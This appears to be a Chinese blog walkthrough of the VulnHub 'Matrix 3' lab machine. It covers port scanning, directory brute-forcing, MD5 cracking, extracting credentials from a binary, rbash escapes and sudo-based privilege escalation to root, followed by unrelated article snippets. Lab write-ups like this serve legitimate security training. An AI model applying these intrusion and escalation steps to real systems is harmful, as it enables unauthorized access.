Matrix:3

最新推荐文章于 2024-07-23 11:46:27 发布
最新推荐文章于 2024-07-23 11:46:27 发布
阅读量1k 收藏 22
点赞数 17
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzf011900/article/details/135749651
版权

下载地址https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova

测试机系统:kali、win11

Matrix3靶机IP地址:192.168.248.131

Kali的IP地址:192.168.248.132

下载并导入靶机

打开vmware——文件—打开—hackme.ova—导入虚拟机

查看网络适配器

将靶机网络适配器改为NAT模式

启动靶机

点击 ▶靶机,开启成功

nmap -sP -T4 192.168.248.0/24 -oN nmap220.sP

发现靶机IP:192.168.248.131

使用nmap发现靶机开放的端口,已开放80、6464、7331三个端口

nmap -A -T4 192.168.248.131 -p- -oN nmap160.A

分别访问7331、80端口查看页面

7331端口页面是一个登陆页面,但无账号密码

80端口页面,页面提示“Follow the White Rabbit”,并在页面下面发现白兔子图片,查看网页源码发现兔子图片的链接

打开图片链接,图片名给了提示“Matrix_can-show-you-the-door”

http://192.168.248.131/assets/img/Matrix_can-show-you-the-door.png

直接在80端口,访问Matrix目录,发现可以打开,并发现很多目录

http://192.168.248.131/Matrix/

在Matrix/n/e/o/6/4/目录下发现一个secret.gz文件,应该是一个提示

http://192.168.248.131/Matrix/n/e/o/6/4

将secret.gz下载到本地,无法解压,再查看文件的类型是一个文本文件,ls查看文本内容发现登录用户和加密后的密码

wget http://192.168.248.131/Matrix/n/e/o/6/4/secret.gz

gunzip secret.gz

ls

file secret.gz

cat secret.gz

密文采用md5加密,解密后密码为:passwd

使用admin/passwd登录7331端口页面

使用kali下的dirb工具爆破目录及文件,发现assets、data目录

dirb http://192.168.248.131:7331/ -u admin:passwd -w

在data目录下发现data文件

下载data文件到本地:

wget http://192.168.248.131:7331/data/data --user=admin --password=passwd

查看data文件的文件类型,是一个Windows下的文件,但是在这里遇见了问题,没有找出data文件中隐藏的内容

file data

使用IDA Pro反编译data文件找到了guest用户及密码为:7R1n17yN30

正如我们已经从我们的nmap扫描知道有SSH在目标计算机上的端口6464上运行,因此我们尝试用上面找到用户名和密码的ssh目标机就能成功的登录。

命令: ssh guest@192.168.248.131 –p 6464

输入密码:7R1n17yN30

漏洞利用

使用 guest/7R1n17yN30 进行 ssh 登录得到,获得 bash ,不过是一个受限制的 bash ,rbash ( restriced bash ) ,使得一些基本的命令都无法执行

  •  获取完整 shell

方法一

使用 -t “bash --noprofile” 来禁止相关的启动脚本,从而获得完整的 shell

ssh guest@192.168.248.131 -p 6464 -t "bash --noprofile"

方法二

利用 vi 编辑器,改变环境变量 getshell

  1. 查看可执行权限的路径和命令,发现可以使用 vi 编辑器

  1. 进入 vi 编辑器之后,按 esc 键,接着输入 :!/bin/sh 反弹 shell (感叹号表示强制执行)

  1. 修改环境变量 PATH

export PATH="/usr/bin"

/usr/bin/bash

ps:不能直接在不完整的 shell 中修改环境变量 PATH,因为权限不够,只读权限(readonly variable)

  • 提权
  1. 使用 sudo -l 发现可以以 root 权限免密执行 /usr/lib64/xfce4/session/xfsm-shutdown-helper ,以 trinity 权限免密执行 /bin/cp

利用的思路是在 guest 账户下生成 ssh 密钥,然后将同时生成的公钥复制到 trinity 账户下的 .ssh/authorized_keys

  1. 把原先 guest 账户下的 .ssh 文件删除,重新生成 .ssh

rm -rf .ssh

ssh-keygen

  1. 对于 .ssh 目录和 id_rsa.pub 文件要赋予完全权限(所有用户都拥有最高权限 – rwx)

chmod 777 .ssh

chmod 777 .ssh/id_rsa.pub

ls -al .ssh/

  1. 将公钥 id_rsa.pub 复制给 trinity 账户下的 .ssh/authorized_keys,使用 ssh 携带 guest 的密钥在环回接口登录即可

sudo -u trinity /bin/cp .ssh/id_rsa.pub /home/trinity/.ssh/authorized_keys

ssh trinity@127.0.0.1 -i .ssh/id_rsa -p 6464

sudo -l

   使用ssh连接trinity用户,成功登录

  1. sudo -l 查看当前 trinity 用户的权限,发现可以以 root 权限免密执行 /home/trinity/oracle ,实际上在 /home/trinity 目录下没有 oracle 可执行文件,利用的思路是将 /usr/bin 目录下用的 bash 可执行文件复制给 trinity 目录下的 oracle 文件,然后赋予可执行权限之后使用 sudo 执行即可提权。

cp /usr/bin/bash oracle

chmod +x oracle

sudo ./oracle

调用oracle,成功拥有root权限,在root目录下找到flag.txt文件

sudo ./oracle

cd /root/

cat flag.txt

完成!over!!

什么都好奇
关注
maxscript matrix3的解释
chinaloft的博客
04-13 515
matrix3 <row1_point3> <row2_point3> <row3_point3> <row4_point3> 就是一个矩阵数据,存储物体的位置和变换信息,简单理解为,就是定义了物体4个点的位置坐标 matrix3 <X点位置> <Y点位置> <Z点位置> <0点位置> 就是一个很简单的数据存放类型 脚本运行,看结果 aa=$.transform prin...
Matrix 3
猎荒者
03-11 922
So I won’t hesitate No more no more It cannot wait 0x00 环境准备 Kali-Linux(IP:10.10.16.128) Matrix 3 虚拟机 NAT 网络连接 0x01 主机发现 nmap -sP 10.10.16.0/24 0x02 端口扫描 nmap -A -v -sS -sV -p- -T4 10.10.16.151 ...
Three 三维矩阵(Matrix3)、四维矩阵(Matrix4)
最新发布
前端学习杂记,记录学习中的前端知识。
07-23 1176
将传入的欧拉角转换为该矩阵的旋转分量(左上角的3x3矩阵)。throwOnDegenerate - (optional) 如果设置为true,如果矩阵是退化的(如果不可逆的话),则会抛出一个错误。throwOnDegenerate - (optional) 如果设置为true,如果矩阵是退化的(如果不可逆的话),则会抛出一个错误。,如果throwOnDegenerate 参数没有设置且给定矩阵不可逆,那么将当前矩阵设置为3X3单位矩阵。把该矩阵设置为绕x轴旋转弧度theta (θ)大小的矩阵。
matrix3
Jerry_ICCAS的博客
10-10 432
//Writed by YaoPu, Oct 10,2016 //if any problem,send email yaopu@iccas.ac.cn //only for 2 processors !!!!! #include"mpi.h" #include int main(int argc,char **argv) { int rows=6,cols=5; int tag=0; MPI
Matrix3
racerun的专栏
07-02 189
缩放 1-kx*kx -kxky -kxkz -kxky 1-kyky -kykz -kxkz -kykz 1-kzkz 镜像 1-2nxnx -2nxny -2nxnz -2nxny 1-2nyny -2nynz -2nxnz -2nzny 1-2nznz
docker-matrix:Matrix是开发人员的一致开发环境
05-10
Matrix是面向开发人员的开发堆栈环境 想要贡献吗? 查看并解决您感兴趣的问题! 介绍 无论何时更换计算机,或者只是在多台计算机上工作或跨不同的操作系统,Matrix都会提供一致的开发环境。 用法 docker pull ...
Matrix:Matrix协议Swift包
03-07
SDK包含: MatrixMatrixClient 。 如果您需要所有库,只需导入MatrixSDK 用法 矩阵 [矩阵]规范的全局实现。 MatrixClient 要开始使用[矩阵]客户端,您可以创建一个实例: let client = MatrixClient () 这将...
matrix:矩阵运算和计算库
04-28
毫升矩阵 矩阵处理和计算库。 由维护 安装 $ npm install ml-matrix 用法 作为ES模块 import { Matrix } from 'ml-matrix' ; ...var B = new Matrix ( [ [ 3 , 3 ] , [ 1 , 1 ] ] ) ; var C = ne
matrix:Matrix服务器的OCF配置
05-13
3. **集群配置**:使用像Pacemaker这样的集群管理工具来配置集群。每个节点都需要安装Pacemaker和Corosync,这两个组件协同工作以管理和协调集群资源。你需要定义Matrix服务器资源,指定OCF RA,并配置必要的依赖...
matrix:Go语言的Matrix软件包[已弃用]
02-04
Gonum矩阵 该存储库不再维护。 开发已移至 。 这是Go语言的矩阵包。 问题 如果发现任何错误,如果该存储库中存在该错误,请随时在的github,请执行以下操作: 不会对此存储库进行任何代码更改。...
css3 transform matrix 深入理解
热门推荐
目尽地平线
01-17 1万+
矩阵可以用来表示图形的变换。css3定义了matrixmatrix3d方法,用来表示2维和3维的变换。下文将分析这两个接口的使用方法,并且用下文的思路,实现了一个简单的用js控制css3变换的jquery插件css3js
Vulnhub靶机实战——Matrix3
冠霖L的博客
11-15 911
下载地址: https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova 环境: VMware 15虚拟机软件 Matrix3靶机IP地址:192.168.220.160 Kali的IP地址:192.168.220.155 Matrix3靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155 ip add...
Machine_Matrix靶机渗透测试
weixin_49340699的博客
06-17 372
Machine_Matrix靶机渗透测试 环境 kali, 靶机 工具 kali自带netdiscover,hydra,crunch,nmap,dirb,以及一些解码工具 主机发现及端口扫描 用netdiscover对内网进行扫描发现目标主机 netdiscover -i eth0 -r 192.168.19.0/24 然后用nmap对目标主机进行端口扫描 nmap -sV 192.168.19.132 发现开启了22 ssh 服务和80端口和一个未知的31337端口 直接访问80端口查看源码没有任
【愚公系列】2023年06月 网络安全高级班 100.CTF黑客比赛(Matrix1靶机)
时光隧道
06-05 4192
Matrix1靶机是一个虚拟机环境,旨在提供一个安全训练平台,帮助安全爱好者和专业人士了解和学习网络安全,通过攻击和防御漏洞来提高自身的技能和知识。Matrix1靶机包含多种实际场景的漏洞,包括网络渗透、Web应用程序漏洞、密码破解、逆向工程等,用户可以通过实际操作来学习和理解这些漏洞的原理和危害。以root用户身份登录到系统中。打开终端窗口,并输入以下命令,编辑/etc/profile文件:sudo vi /etc/profile在文件的末尾添加以下两行命令:export 变量名=变量值。
靶机渗透测试(Matrix_1)
@小张小张的博客
10-06 768
靶机渗透测试(Matrix_1): Vulnhub靶机 Matrix_1 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(Intermediate) 目标:Your Goal is to get root and read /root/flag.txt. 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 探测出靶机ip为:192.168.10.82 2. nmap进行靶机端口服务扫描 命令:
vulnhub靶机实战--Matrix:1
清唪的博客
04-13 3639
1.netdiscover 探测靶机ip地址 2.nmap -sS -A -p- +靶机ip 对靶机进行端口服务扫描 3.查看一下80端口网页发现并没有什么卵用 4.dirb http://+靶机ip 目录扫描 发现并没有什么卵用 5.我们上面的端口扫描有个31337端口可以尝试看看它有什么作用 我们来查看它的源代码 发现有base64 耶耶耶~~ 可以解码了 echo “ZWNobyAiVGhlbiB5b3UnbGwgc2VlL...
vulnhub靶机实战——Matrix_1
冠霖L的博客
10-31 1130
环境:Vmware 15 Kali:192.168.150.129 Matrix靶机:192.168.150.130 1、 发现主机 Matrix靶机、Kali添加至“仅主机模式”,查看Kali的IP地址为:192.168.150.129 使用nmap扫描192.168.150.0/24网段发现靶机IP地址:192.168.150.130 nmap -sP 192.168.150.0/24 -oN...
在n行n列(n<=10)的二维整数数组中,按照以下要求选出一个数。首先从每行中选出最大数,再从选出的n个最大数中选出最小数 程序运行示例: Please enter the order of the matrix:3 Please input the elements of the matrix: 9 2 3 4 5 8 7 2 1 The minimum of maximum number is 7. 输入提示:“PIease enter the order of the matrix:” 输入格式:%d 输入提示:“please input the elements of the matrix:\n” 输入格式:%d 输出提示:“The minimum of maximum number is %d.\n”
06-01
以下是解决该问题的 C++ 代码: ```c++ #include ...Please enter the order of the matrix: 3 Please input the elements of the matrix: 9 2 3 4 5 8 7 2 1 The minimum of maximum number is 7. ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

什么都好奇

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值